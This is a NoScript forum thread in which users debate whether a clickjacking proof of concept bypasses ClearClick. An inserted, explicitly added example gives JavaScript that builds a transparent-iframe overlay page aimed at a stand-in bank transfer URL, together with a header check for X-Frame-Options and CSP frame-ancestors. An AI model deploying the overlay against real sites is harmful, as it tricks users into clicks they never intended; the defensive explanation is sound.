ClearClick Bypass?

Howdy

ClearClick Bypass?

Post by Howdy »

http://lcamtuf.coredump.cx/clickit/ doesn't seem to trigger ClearClick.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: ClearClick Bypass?

Post by Tom T. »

There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)". That was good enough for me not to allow it (except as an experiment, of course).

And the attack does nothing at all if you don't allow script at the attacker's site.

If you'd like to see something interesting, go to the linked site, do *not* allow any script, and click the link "can be made seamless". The guts get exposed. :)

I can't immediately find the thread in which Giorgio explained to another user that the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.

Side note: For best safety, in Firefox Tools > Options > Content > Enable JavaScript > Advanced, uncheck *all* boxes on the pop-up box. "Allow scripts to..."
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24
therube
Ambassador
Posts: 7969
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: ClearClick Bypass?

Post by therube »

> There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)".
> the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.

I saw neither the warning nor the yellow bar?

> And the attack does nothing at all if you don't allow script at the attacker's site.

Not necessarily.
If the attacker's site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)

Not sure if "clickit" falls under the definition of "Clickjacking/ClearClick".

In any case, IMO, the POC is valid, it works.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0a2) Gecko/20111211 Firefox/10.0a2 SeaMonkey/2.7a2
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: ClearClick Bypass?

Post by Tom T. »

> therube wrote:
> > Tom T. wrote: There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)".
> > the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.
> I saw neither the warning nor the yellow bar?

It took several iterations of "playing the game".

> > And the attack does nothing at all if you don't allow script at the attacker's site.
> Not necessarily.
> If the attacker's site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)

Perhaps on Fx 8.x or the equivalent SM, but on Fx 3.6.24, default-denying the site's JS means that clicking the POC button produced "no action at all".
Perhaps it is another "improvement" in newer Fx and SM.

> Not sure if "clickit" falls under the definition of "Clickjacking/ClearClick".

Agreed, it was more of a JS redirect. True clickjacking would involve layered elements, which I did not see in a brief glance.

> In any case, IMO, the POC is valid, it works.

It didn't for me, until the POC site's JS was TA'd. And I got the "warning" after playing the "game" several times.
And at the other link cited, it produced a blank page, listing all the scripts that were blocked (in the page, not just the NS menu)

Perhaps a difference from older Fx/SM, but a regression, IMHO. YMMV.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/3.6.24
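The "layered elements" Tom T. describes, and therube's point that the attacker's page does not need JavaScript for them, as an added example that is not part of the thread and not code from NoScript or from the clickit PoC. The first function builds the classic overlay page (a transparent iframe of the target positioned over a decoy button, layered purely with CSS); the second decides from a target's response headers whether a browser would let that page be framed at all, which is the server-side control that defeats the overlay. The target URL `https://bank.example/transfer`, the origins, the pixel offsets and the function names are all constructed for this example.

```javascript
// Added example, not code from the thread or from NoScript: the layered
// clickjacking page the discussion contrasts with a plain JS redirect, and a
// check of the response headers that decide whether a target can be framed.
// The target URL, origins and pixel offsets below are constructed for the
// example and do not refer to any real site.

// Build an attacker page that layers a transparent iframe of the target over a
// decoy button. Nothing here needs script on the attacker's page: CSS alone
// positions the frame, so blocking JavaScript on that site does not remove the
// overlay (the point therube makes above).
function buildOverlayPage(targetUrl, decoyLabel, offset) {
  // offset shifts the framed page so its real button sits under the decoy;
  // an attacker measures these values against the target's layout.
  const { top, left } = offset;
  return [
    '<!doctype html>',
    '<html><head><style>',
    '  #decoy  { position:absolute; top:100px; left:100px; font-size:20px; }',
    '  #target { position:absolute; border:0; opacity:0; z-index:2;',
    `            top:${top}px; left:${left}px; width:600px; height:400px; }`,
    '</style></head><body>',
    `  <button id="decoy">${decoyLabel}</button>`,
    // z-index puts the invisible frame above the decoy, so the click lands in
    // the framed page rather than on the button the victim sees.
    `  <iframe id="target" src="${targetUrl}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Match one CSP frame-ancestors source expression against the framing origin:
// a scheme-qualified or bare host, optionally with a leading "*." wildcard.
// The keywords 'self', 'none' and '*' are handled by the caller.
function sourceMatches(src, framerOrigin) {
  const framer = new URL(framerOrigin);
  const host = src.replace(/^[a-z][a-z0-9+.-]*:\/\//, '');
  if (host.startsWith('*.')) return framer.hostname.endsWith(host.slice(1));
  return host === framer.hostname || src === framer.origin.toLowerCase();
}

// Decide whether a response with these headers may be framed by framerOrigin.
// CSP frame-ancestors takes precedence when present; otherwise X-Frame-Options
// DENY / SAMEORIGIN applies. Any other value, or no header, leaves the page
// frameable, which is the state the overlay above relies on.
function framingAllowed(headers, targetOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map(d => d.trim())
      .find(d => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map(s => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      if (sources.includes('self') && framerOrigin === targetOrigin) return true;
      return sources.some(src => sourceMatches(src, framerOrigin));
    }
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === targetOrigin;
  return true;
}
```

Run it with a target that sends neither header and `framingAllowed` returns true, which is the only case in which the overlay page does anything; with `X-Frame-Options: DENY` or `frame-ancestors 'none'` the frame stays blank and the victim's click hits the decoy. ClearClick sits on the client side of this and catches the overlay regardless of what the target sends; a plain same-window redirect like the one Tom T. saw has no frame to catch, which is why NoScript reports it with its redirect bar instead.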
therube
Ambassador
Posts: 7969
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: ClearClick Bypass?

Post by therube »

> > Not necessarily.
> > If the attacker's site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)
> Perhaps on Fx 8.x or the equivalent SM, but on Fx 3.6.24, default-denying the site's JS means that clicking the POC button produced "no action at all".
> Perhaps it is another "improvement" in newer Fx and SM.

In this instance, I was speaking in general, & not specifically about the particular POC.

Just pointing out that JavaScript is not a prerequisite for "malware".

> v 2.2.4rc2
> ==========================================================================
> + [ClearClick] Enhanced protection against same-window timing attacks
> with moving pointer (thanks Michal Zalewski for PoC)

Could you explain what we're supposed to see, or not, because I'm not sure I'm seeing any change?

So I suppose I lost :(.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:10.0a2) Gecko/20111212 Firefox/10.0a2 SeaMonkey/2.7a2